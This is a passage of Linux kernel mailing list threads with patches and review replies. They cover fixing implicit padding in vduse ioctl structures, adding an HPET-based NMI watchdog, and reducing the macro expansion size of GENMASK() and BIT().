+#if defined(CONFIG_X86_64) && defined(CONFIG_COMPAT)
+ case COMPAT_VDUSE_VQ_GET_INFO:
+#endif
case VDUSE_VQ_GET_INFO: {
- struct vduse_vq_info vq_info;
+ struct vduse_vq_info vq_info = {};
struct vduse_virtqueue *vq;
u32 index;
ret = -EFAULT;
- if (copy_from_user(&vq_info, argp, sizeof(vq_info)))
+ if (copy_from_user(&vq_info, argp, _IOC_SIZE(cmd)))
break;
ret = -EINVAL;
@@ -1491,7 +1528,7 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
vq_info.ready = vq->ready;
ret = -EFAULT;
- if (copy_to_user(argp, &vq_info, sizeof(vq_info)))
+ if (copy_to_user(argp, &vq_info, _IOC_SIZE(cmd)))
break;
ret = 0;
--
2.39.5
|
{
"author": "Arnd Bergmann <arnd@kernel.org>",
"date": "Mon, 2 Feb 2026 10:59:32 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
On Mon, Feb 2, 2026 at 11:06 AM Arnd Bergmann <arnd@kernel.org> wrote:
s/indiviudally/individually/ if v2
That's something I didn't take into account, thanks!
I did not know about _IOC_SIZE and I like how it reduces the complexity, thanks!
As a proposal, maybe we can add MIN(_IOC_SIZE(cmd), sizeof(entry))? Not
sure if it is too much boilerplate for nothing, as the compiler should
generate identical code and the uapi ioctl part should never change.
But it seems to me that future changes to the code are better guarded
with the MIN.
I'm ok with not including MIN() either way.
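A small userspace sketch of the idea being discussed (hypothetical command numbers and structs): _IOC_SIZE() recovers the struct size encoded in the ioctl command, and the proposed MIN() clamps it to the kernel-side buffer:

```c
#include <assert.h>
#include <linux/ioctl.h>
#include <linux/types.h>
#include <stddef.h>

struct demo_entry_v1 {
    __u64 start;
    __u64 last;
};

struct demo_entry_v2 {
    __u64 start;
    __u64 last;
    __u32 asid;
    __u32 padding;
};

/* Same direction/type/nr; the struct size is folded into the cmd value. */
#define DEMO_GET_V1 _IOWR('D', 0x10, struct demo_entry_v1)
#define DEMO_GET_V2 _IOWR('D', 0x10, struct demo_entry_v2)

/* Copy exactly the size the command encodes, clamped to the kernel-side
 * buffer as the MIN() proposal suggests. */
static size_t demo_copy_len(unsigned int cmd, size_t buf_len)
{
    size_t user_len = _IOC_SIZE(cmd);

    return user_len < buf_len ? user_len : buf_len;
}
```

With fixed uapi structs the clamp is indeed a no-op, but it keeps the copy bounded if the structs and the ioctl definitions ever drift apart.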
|
{
"author": "Eugenio Perez Martin <eperezma@redhat.com>",
"date": "Mon, 2 Feb 2026 12:28:26 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
On Mon, Feb 2, 2026 at 11:07 AM Arnd Bergmann <arnd@kernel.org> wrote:
I'm just learning about the COMPAT_ stuff, but does this mean the
userland app needs to call a different ioctl depending on whether it
is compiled for 32 bits or 64 bits? I guess that is not the case, but
how is that handled?
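No separate call should be needed from userspace: _IOWR() folds sizeof() of the struct into the command number, so the same source-level macro expands to different cmd values on i386 and x86_64, and the kernel can simply list both in one switch. A sketch under hypothetical names (the packed/aligned attributes emulate the i386 layout when built on a 64-bit host):

```c
#include <assert.h>
#include <linux/ioctl.h>

/* x86_64 layout: u64 members are 8-byte aligned, 7 bytes of tail padding. */
struct entry64 {
    unsigned long long start;
    unsigned char perm;
    unsigned char pad[7];
};

/* i386-style layout: u64 is only 4-byte aligned, so 3 bytes of padding. */
struct entry32 {
    unsigned long long start;
    unsigned char perm;
    unsigned char pad[3];
} __attribute__((packed, aligned(4)));

/* The same macro text yields distinct cmd values because the sizes differ. */
#define GET_ENTRY64 _IOWR('V', 0x10, struct entry64)
#define GET_ENTRY32 _IOWR('V', 0x10, struct entry32)

/* One handler accepts both encodings; userspace always writes the same
 * GET_ENTRY macro and never has to know which ABI it was built for. */
static int handled(unsigned int cmd)
{
    switch (cmd) {
    case GET_ENTRY64:
    case GET_ENTRY32:
        return 1;
    default:
        return 0;
    }
}
```

This mirrors how the patch adds a COMPAT_ case label next to the native one in the existing switch rather than a separate .compat_ioctl handler.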
|
{
"author": "Eugenio Perez Martin <eperezma@redhat.com>",
"date": "Mon, 2 Feb 2026 12:34:48 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
On Mon, Feb 2, 2026 at 12:28 PM Eugenio Perez Martin
<eperezma@redhat.com> wrote:
(I hit "Send" too early).
We could make this padding[3] so reserved stays [12]. This way
the struct members keep the same layout between the commits. Not
super important, as there should not be many users of this right
now; we're just introducing it.
|
{
"author": "Eugenio Perez Martin <eperezma@redhat.com>",
"date": "Mon, 2 Feb 2026 12:50:49 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
From: Arnd Bergmann <arnd@arndb.de>
The vduse_iova_range_v2 and vduse_iotlb_entry_v2 structures are both
defined in a way that adds implicit padding and is incompatible between
i386 and x86_64 userspace because of the different structure alignment
requirements. Building the header with -Wpadded shows these new warnings:
vduse.h:305:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
vduse.h:374:1: error: padding struct size to alignment boundary with 4 bytes [-Werror=padded]
Change the amount of padding in these two structures to align them to
64 bit words and avoid those problems. Since the v1 vduse_iotlb_entry
already has an inconsistent size, do not attempt to reuse the structure
but rather list the members individually, with a fixed amount of
padding.
Fixes: 079212f6877e ("vduse: add vq group asid support")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
---
drivers/vdpa/vdpa_user/vduse_dev.c | 40 +++++++++++-------------------
include/uapi/linux/vduse.h | 9 +++++--
2 files changed, 21 insertions(+), 28 deletions(-)
diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
index 73d1d517dc6c..405d59610f76 100644
--- a/drivers/vdpa/vdpa_user/vduse_dev.c
+++ b/drivers/vdpa/vdpa_user/vduse_dev.c
@@ -1301,7 +1301,7 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
int r = -EINVAL;
struct vhost_iotlb_map *map;
- if (entry->v1.start > entry->v1.last || entry->asid >= dev->nas)
+ if (entry->start > entry->last || entry->asid >= dev->nas)
return -EINVAL;
asid = array_index_nospec(entry->asid, dev->nas);
@@ -1312,18 +1312,18 @@ static int vduse_dev_iotlb_entry(struct vduse_dev *dev,
spin_lock(&dev->as[asid].domain->iotlb_lock);
map = vhost_iotlb_itree_first(dev->as[asid].domain->iotlb,
- entry->v1.start, entry->v1.last);
+ entry->start, entry->last);
if (map) {
if (f) {
const struct vdpa_map_file *map_file;
map_file = (struct vdpa_map_file *)map->opaque;
- entry->v1.offset = map_file->offset;
+ entry->offset = map_file->offset;
*f = get_file(map_file->file);
}
- entry->v1.start = map->start;
- entry->v1.last = map->last;
- entry->v1.perm = map->perm;
+ entry->start = map->start;
+ entry->last = map->last;
+ entry->perm = map->perm;
if (capability) {
*capability = 0;
@@ -1363,14 +1363,8 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
break;
ret = -EFAULT;
- if (cmd == VDUSE_IOTLB_GET_FD2) {
- if (copy_from_user(&entry, argp, sizeof(entry)))
- break;
- } else {
- if (copy_from_user(&entry.v1, argp,
- sizeof(entry.v1)))
- break;
- }
+ if (copy_from_user(&entry, argp, _IOC_SIZE(cmd)))
+ break;
ret = -EINVAL;
if (!is_mem_zero((const char *)entry.reserved,
@@ -1385,19 +1379,13 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
if (!f)
break;
- if (cmd == VDUSE_IOTLB_GET_FD2)
- ret = copy_to_user(argp, &entry,
- sizeof(entry));
- else
- ret = copy_to_user(argp, &entry.v1,
- sizeof(entry.v1));
-
+ ret = copy_to_user(argp, &entry, _IOC_SIZE(cmd));
if (ret) {
ret = -EFAULT;
fput(f);
break;
}
- ret = receive_fd(f, NULL, perm_to_file_flags(entry.v1.perm));
+ ret = receive_fd(f, NULL, perm_to_file_flags(entry.perm));
fput(f);
break;
}
@@ -1603,16 +1591,16 @@ static long vduse_dev_ioctl(struct file *file, unsigned int cmd,
} else if (info.asid >= dev->nas)
break;
- entry.v1.start = info.start;
- entry.v1.last = info.last;
+ entry.start = info.start;
+ entry.last = info.last;
entry.asid = info.asid;
ret = vduse_dev_iotlb_entry(dev, &entry, NULL,
&info.capability);
if (ret < 0)
break;
- info.start = entry.v1.start;
- info.last = entry.v1.last;
+ info.start = entry.start;
+ info.last = entry.last;
info.asid = entry.asid;
ret = -EFAULT;
diff --git a/include/uapi/linux/vduse.h b/include/uapi/linux/vduse.h
index faae7718bd2e..deca8c7b9178 100644
--- a/include/uapi/linux/vduse.h
+++ b/include/uapi/linux/vduse.h
@@ -299,9 +299,13 @@ struct vduse_iova_info {
* Structure used by VDUSE_IOTLB_GET_FD2 ioctl to find an overlapped IOVA region.
*/
struct vduse_iotlb_entry_v2 {
- struct vduse_iotlb_entry v1;
+ __u64 offset;
+ __u64 start;
+ __u64 last;
+ __u8 perm;
+ __u8 padding[7];
__u32 asid;
- __u32 reserved[12];
+ __u32 reserved[11];
};
/*
@@ -371,6 +375,7 @@ struct vduse_iova_range_v2 {
__u64 start;
__u64 last;
__u32 asid;
+ __u32 padding;
};
/**
--
2.39.5
|
On Mon, Feb 2, 2026, at 12:34, Eugenio Perez Martin wrote:
In a definition like
#define VDUSE_IOTLB_GET_FD _IOWR(VDUSE_BASE, 0x10, struct vduse_iotlb_entry)
The resulting integer value encodes sizeof(struct vduse_iotlb_entry)
in some of the bits. Since x86-32 and x86-64 have different
sizes for this particular structure, the command codes are
different for the same macro. The recommendation from
Documentation/driver-api/ioctl.rst is to use structures with
a consistent layout across all architectures to avoid that.
The normal way to handle this once it has gone wrong is to split
out the actual handler into a function that takes the kernel
structure, and a .compat_ioctl() handler that copies the
32-bit structure to the stack in the correct format.
Since the v1 structures here are /almost/ compatible aside from
the padding at the end, my patch here takes a shortcut and does
not add a custom .compat_ioctl handler but instead changes
the native version on x86-64 to deal with both layouts.
This does mean that the kernel driver now also accepts the
64-bit layout coming from compat tasks, and the compat layout
coming from 64-bit tasks.
Nothing in userspace changes, as it still just uses the existing
VDUSE_IOTLB_GET_FD macro, and the kernel continues to handle
the native layout as before.
Arnd
|
{
"author": "\"Arnd Bergmann\" <arnd@arndb.de>",
"date": "Mon, 02 Feb 2026 12:59:03 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
On Mon, Feb 2, 2026, at 12:50, Eugenio Perez Martin wrote:
I think it's more readable without the MIN(), but I don't mind
adding it either.
I think that is too risky, as it would overlay 'asid' on top of
previously uninitialized padding fields coming from userspace
on most architectures. Since there was previously no is_mem_zero()
check for the padding, I don't think it should be reused at all.
Arnd
|
{
"author": "\"Arnd Bergmann\" <arnd@arndb.de>",
"date": "Mon, 02 Feb 2026 13:06:54 +0100",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 1/2] vduse: avoid adding implicit padding
|
On Mon, Feb 02, 2026 at 12:59:03PM +0100, Arnd Bergmann wrote:
I think .compat_ioctl would be cleaner frankly. Just look at
all the ifdefery. And who knows what broken-ness userspace
comes up with with this approach. Better use the standard approach.
|
{
"author": "\"Michael S. Tsirkin\" <mst@redhat.com>",
"date": "Mon, 2 Feb 2026 11:45:13 -0500",
"thread_id": "20260202114412-mutt-send-email-mst@kernel.org.mbox.gz"
}
|
lkml
|
[PATCH 0/2] Add HPET NMI Watchdog support
|
The current NMI watchdog relies on performance counters and consistently
occupies one on each CPU. When running virtual machines, we want to pass
performance counters to virtual machines so they can make use of them.
In addition the host system wants to use performance counters to check
the system to identify when anything looks abnormal, such as split
locks.
That makes PMCs a precious resource. So any PMC we can free up is a PMC
we can use for something useful. That made me look at the NMI watchdog.
The PMC based NMI watchdog implementation does not actually need any
performance counting. It just needs a per-CPU NMI timer source. X86
systems can make anything that emits an interrupt descriptor (IOAPIC,
MSI(-X), etc) become an NMI source. So any time goes. Including the
HPET. And while they can't really operate per-CPU, in almost all cases
you only really want the NMI on *all* CPUs, rather than per-CPU.
So I took a stab at building an HPET based NMI watchdog. In my (QEMU
based) testing, it's fully functional and can successfully detect when
CPUs get stuck. It even survives suspend/resume cycles.
For now, its enablement is a config time option because the hardlockup
framework does not support dynamic switching of multiple detectors.
That's ok for our use case. But maybe something for the interested
reader to tackle eventually :).
You can enable the HPET watchdog by default by setting
CONFIG_HARDLOCKUP_DETECTOR_HPET_DEFAULT=y
or passing "hpet=watchdog" to the kernel command line. When active, it
will emit a kernel log message to indicate it works:
[ 0.179176] hpet: HPET watchdog initialized on timer 0, GSI 2
The HPET can only be in either watchdog or generic mode. I am a bit
worried about IO-APIC pin allocation logic, so I opted to reuse the
generic timer pin. And that means I'm effectively breaking the normal
interrupt delivery path. So the easy way out was to say that when the watchdog is
active, PIT and HPET are not available as timer sources. Which is ok on
modern systems. There are way too many (unreliable) timer sources on x86
already. Trimming a few surely won't hurt.
I'm open to inputs on how to make the HPET multi-purpose though, in case
anyone feels strongly about it.
Alex
Alexander Graf (2):
x86/ioapic: Add NMI delivery configuration helper
hpet: Add HPET-based NMI watchdog support
.../admin-guide/kernel-parameters.txt | 5 +-
arch/x86/Kconfig | 19 ++
arch/x86/include/asm/io_apic.h | 2 +
arch/x86/kernel/apic/io_apic.c | 32 ++++
arch/x86/kernel/hpet.c | 172 ++++++++++++++++++
arch/x86/kernel/i8253.c | 9 +
drivers/char/hpet.c | 3 +
include/linux/hpet.h | 14 ++
8 files changed, 255 insertions(+), 1 deletion(-)
--
2.47.1
Amazon Web Services Development Center Germany GmbH
Tamara-Danz-Str. 13
10243 Berlin
Geschaeftsfuehrung: Christof Hellmis, Andreas Stieger
Eingetragen am Amtsgericht Charlottenburg unter HRB 257764 B
Sitz: Berlin
Ust-ID: DE 365 538 597
|
To implement an HPET based NMI watchdog, the HPET code will need to
reconfigure an IOAPIC pin to NMI mode. Add a function that allows driver
code to configure an IOAPIC pin for NMI delivery mode.
(Disclaimer: Some of this code was written with the help of Kiro, an AI
coding assistant)
Signed-off-by: Alexander Graf <graf@amazon.com>
---
arch/x86/include/asm/io_apic.h | 2 ++
arch/x86/kernel/apic/io_apic.c | 32 ++++++++++++++++++++++++++++++++
2 files changed, 34 insertions(+)
diff --git a/arch/x86/include/asm/io_apic.h b/arch/x86/include/asm/io_apic.h
index 0d806513c4b3..58cfb338bf39 100644
--- a/arch/x86/include/asm/io_apic.h
+++ b/arch/x86/include/asm/io_apic.h
@@ -158,6 +158,8 @@ extern void mp_save_irq(struct mpc_intsrc *m);
extern void disable_ioapic_support(void);
+extern int ioapic_set_nmi(u32 gsi, bool broadcast);
+
extern void __init io_apic_init_mappings(void);
extern unsigned int native_io_apic_read(unsigned int apic, unsigned int reg);
extern void native_restore_boot_irq_mode(void);
diff --git a/arch/x86/kernel/apic/io_apic.c b/arch/x86/kernel/apic/io_apic.c
index 28f934f05a85..006f328929cd 100644
--- a/arch/x86/kernel/apic/io_apic.c
+++ b/arch/x86/kernel/apic/io_apic.c
@@ -2951,6 +2951,38 @@ int mp_irqdomain_ioapic_idx(struct irq_domain *domain)
return (int)(long)domain->host_data;
}
+/**
+ * ioapic_set_nmi - Configure an IOAPIC pin for NMI delivery
+ * @gsi: Global System Interrupt number
+ * @broadcast: true to broadcast to all CPUs, false to send to CPU 0 only
+ *
+ * Configures the specified GSI for NMI delivery mode.
+ *
+ * Returns 0 on success, negative error code on failure.
+ */
+int ioapic_set_nmi(u32 gsi, bool broadcast)
+{
+ struct IO_APIC_route_entry entry = { };
+ int ioapic_idx, pin;
+
+ ioapic_idx = mp_find_ioapic(gsi);
+ if (ioapic_idx < 0)
+ return -ENODEV;
+
+ pin = mp_find_ioapic_pin(ioapic_idx, gsi);
+ if (pin < 0)
+ return -ENODEV;
+
+ entry.delivery_mode = APIC_DELIVERY_MODE_NMI;
+ entry.destid_0_7 = broadcast ? 0xFF : 0;
+ entry.dest_mode_logical = 0;
+ entry.masked = 0;
+
+ ioapic_write_entry(ioapic_idx, pin, entry);
+
+ return 0;
+}
+
const struct irq_domain_ops mp_ioapic_irqdomain_ops = {
.alloc = mp_irqdomain_alloc,
.free = mp_irqdomain_free,
--
2.47.1
|
{
"author": "Alexander Graf <graf@amazon.com>",
"date": "Mon, 2 Feb 2026 17:43:15 +0000",
"thread_id": "20260202174316.65044-2-graf@amazon.com.mbox.gz"
}
|
lkml
|
[PATCH 0/2] Add HPET NMI Watchdog support
|
To implement an HPET based NMI watchdog, the HPET code will need to
reconfigure an IOAPIC pin to NMI mode. Add a function that allows driver
code to configure an IOAPIC pin for NMI delivery mode.
The caller can choose whether to invoke NMIs on the BSP or broadcast on
all CPUs in the system.
(Disclaimer: Some of this code was written with the help of Kiro, an AI
coding assistant)
Signed-off-by: Alexander Graf <graf@amazon.com>
---
arch/x86/include/asm/io_apic.h | 2 ++
arch/x86/kernel/apic/io_apic.c | 32 ++++++++++++++++++++++++++++++++
2 files changed, 34 insertions(+)
diff --git a/arch/x86/include/asm/io_apic.h b/arch/x86/include/asm/io_apic.h
index 0d806513c4b3..58cfb338bf39 100644
--- a/arch/x86/include/asm/io_apic.h
+++ b/arch/x86/include/asm/io_apic.h
@@ -158,6 +158,8 @@ extern void mp_save_irq(struct mpc_intsrc *m);
extern void disable_ioapic_support(void);
+extern int ioapic_set_nmi(u32 gsi, bool broadcast);
+
extern void __init io_apic_init_mappings(void);
extern unsigned int native_io_apic_read(unsigned int apic, unsigned int reg);
extern void native_restore_boot_irq_mode(void);
diff --git a/arch/x86/kernel/apic/io_apic.c b/arch/x86/kernel/apic/io_apic.c
index 28f934f05a85..5b303e5d2f3f 100644
--- a/arch/x86/kernel/apic/io_apic.c
+++ b/arch/x86/kernel/apic/io_apic.c
@@ -2951,6 +2951,38 @@ int mp_irqdomain_ioapic_idx(struct irq_domain *domain)
return (int)(long)domain->host_data;
}
+/**
+ * ioapic_set_nmi - Configure an IOAPIC pin for NMI delivery
+ * @gsi: Global System Interrupt number
+ * @broadcast: true to broadcast to all CPUs, false to send to CPU 0 only
+ *
+ * Configures the specified GSI for NMI delivery mode.
+ *
+ * Returns 0 on success, negative error code on failure.
+ */
+int ioapic_set_nmi(u32 gsi, bool broadcast)
+{
+ struct IO_APIC_route_entry entry = { };
+ int ioapic_idx, pin;
+
+ ioapic_idx = mp_find_ioapic(gsi);
+ if (ioapic_idx < 0)
+ return -ENODEV;
+
+ pin = mp_find_ioapic_pin(ioapic_idx, gsi);
+ if (pin < 0)
+ return -ENODEV;
+
+ entry.delivery_mode = APIC_DELIVERY_MODE_NMI;
+ entry.destid_0_7 = broadcast ? 0xFF : boot_cpu_physical_apicid;
+ entry.dest_mode_logical = 0;
+ entry.masked = 0;
+
+ ioapic_write_entry(ioapic_idx, pin, entry);
+
+ return 0;
+}
+
const struct irq_domain_ops mp_ioapic_irqdomain_ops = {
.alloc = mp_irqdomain_alloc,
.free = mp_irqdomain_free,
--
2.47.1
|
{
"author": "Alexander Graf <graf@amazon.com>",
"date": "Mon, 2 Feb 2026 17:48:02 +0000",
"thread_id": "20260202174316.65044-2-graf@amazon.com.mbox.gz"
}
|
lkml
|
[PATCH 0/2] Add HPET NMI Watchdog support
|
On 02.02.26 18:43, Alexander Graf wrote:
Sorry for the resend. I caught an issue while sending out the series,
hit ctrl-c before thinking and suddenly had a half sent series. Discard
this one. Happy review on the real, full one :)
Alex
|
{
"author": "Alexander Graf <graf@amazon.com>",
"date": "Mon, 2 Feb 2026 18:49:13 +0100",
"thread_id": "20260202174316.65044-2-graf@amazon.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-time check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generating an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant,
so it can no longer be used in #if statements (when W=c is set).
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build succeeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) expanding to (2 << (hi)) - (1 << (lo)),
which has the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assembler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the definitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
Change '(x - 1) + x' to '2 * (x - 1) + 1' to avoid expanding the
non-trivial __type_half_max() twice.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
include/linux/overflow.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/include/linux/overflow.h b/include/linux/overflow.h
index 736f633b2d5f..4f014d55ab25 100644
--- a/include/linux/overflow.h
+++ b/include/linux/overflow.h
@@ -31,7 +31,7 @@
* credit to Christian Biere.
*/
#define __type_half_max(type) ((type)1 << (8*sizeof(type) - 1 - is_signed_type(type)))
-#define __type_max(T) ((T)((__type_half_max(T) - 1) + __type_half_max(T)))
+#define __type_max(T) ((T)(2 * (__type_half_max(T) - 1) + 1))
#define type_max(t) __type_max(typeof(t))
#define __type_min(T) ((T)((T)-type_max(T)-(T)1))
#define type_min(t) __type_min(typeof(t))
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:18 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
|
From: David Laight <david.laight.linux@gmail.com>
Since the type is always unsigned, (T)-1 is always the correct value,
so there is no need to use type_max().
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
include/linux/bits.h | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/include/linux/bits.h b/include/linux/bits.h
index a40cc861b3a7..697318f2a47d 100644
--- a/include/linux/bits.h
+++ b/include/linux/bits.h
@@ -45,8 +45,7 @@
*/
#define GENMASK_TYPE(t, h, l) \
((t)(GENMASK_INPUT_CHECK(h, l) + \
- (type_max(t) << (l) & \
- type_max(t) >> (BITS_PER_TYPE(t) - 1 - (h)))))
+ ((t)-1 << (l) & (t)-1 >> (BITS_PER_TYPE(t) - 1 - (h)))))
#define GENMASK(h, l) GENMASK_TYPE(unsigned long, h, l)
#define GENMASK_ULL(h, l) GENMASK_TYPE(unsigned long long, h, l)
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:25 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
|
From: David Laight <david.laight.linux@gmail.com>
Compile-time tests being added to BIT() make it an 'integer constant
expression' rather than a pre-processor expression for W=1 builds.
Change the BIT(PLANE_INDEX_BITS) != VIDEO_MAX_PLANES test to use
static_assert() so the code compiles.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
drivers/media/common/videobuf2/videobuf2-core.c | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/drivers/media/common/videobuf2/videobuf2-core.c b/drivers/media/common/videobuf2/videobuf2-core.c
index 2df566f409b6..90dedab2aeb2 100644
--- a/drivers/media/common/videobuf2/videobuf2-core.c
+++ b/drivers/media/common/videobuf2/videobuf2-core.c
@@ -37,9 +37,9 @@
#define MAX_BUFFER_INDEX BIT_MASK(30 - PLANE_INDEX_SHIFT)
#define BUFFER_INDEX_MASK (MAX_BUFFER_INDEX - 1)
-#if BIT(PLANE_INDEX_BITS) != VIDEO_MAX_PLANES
-#error PLANE_INDEX_BITS order must be equal to VIDEO_MAX_PLANES
-#endif
+
+static_assert(BIT(PLANE_INDEX_BITS) == VIDEO_MAX_PLANES,
+ "PLANE_INDEX_BITS order must be equal to VIDEO_MAX_PLANES");
static int debug;
module_param(debug, int, 0644);
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:20 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
|
From: David Laight <david.laight.linux@gmail.com>
The check for invalid 'compile time constant' parameters can easily be
changed to return 'failed' rather than generating a compile time error.
Add some tests for negative, swapped and overlarge values.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
lib/tests/test_bits.c | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
diff --git a/lib/tests/test_bits.c b/lib/tests/test_bits.c
index 4d3a895f490c..9642c55f5487 100644
--- a/lib/tests/test_bits.c
+++ b/lib/tests/test_bits.c
@@ -144,6 +144,22 @@ static void genmask_input_check_test(struct kunit *test)
BUILD_BUG_ON(GENMASK_INPUT_CHECK(100, 80, 128) != 0);
BUILD_BUG_ON(GENMASK_INPUT_CHECK(110, 65, 128) != 0);
BUILD_BUG_ON(GENMASK_INPUT_CHECK(127, 0, 128) != 0);
+
+ /*
+ * Invalid input
+ * Change GENMASK_INPUT_CHECK() to return 'fail' rather than
+ * generating a compile-time error.
+ */
+#define GENMASK_INPUT_CHECK_FAIL() 1
+ z = 0;
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 31, -1, 32) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 0, 1, 32) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 8, 0, 8) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 16, 0, 16) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 32, 0, 32) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 64, 0, 64) == 0);
+ BUILD_BUG_ON(GENMASK_INPUT_CHECK(z + 128, 0, 128) == 0);
+#undef GENMASK_INPUT_CHECK_FAIL
}
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:31 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
|
From: David Laight <david.laight.linux@gmail.com>
Some compile time checks significantly bloat the pre-processor output
(particularly when they get nested).
Since the checks aren't really needed on every compilation, gate them
behind W=c (adds -DKBUILD_EXTRA_WARNc) so they can be enabled per-build.
Make W=1 imply W=c so the build-bot includes the checks.
As well as reducing the bloat from existing checks (like those in
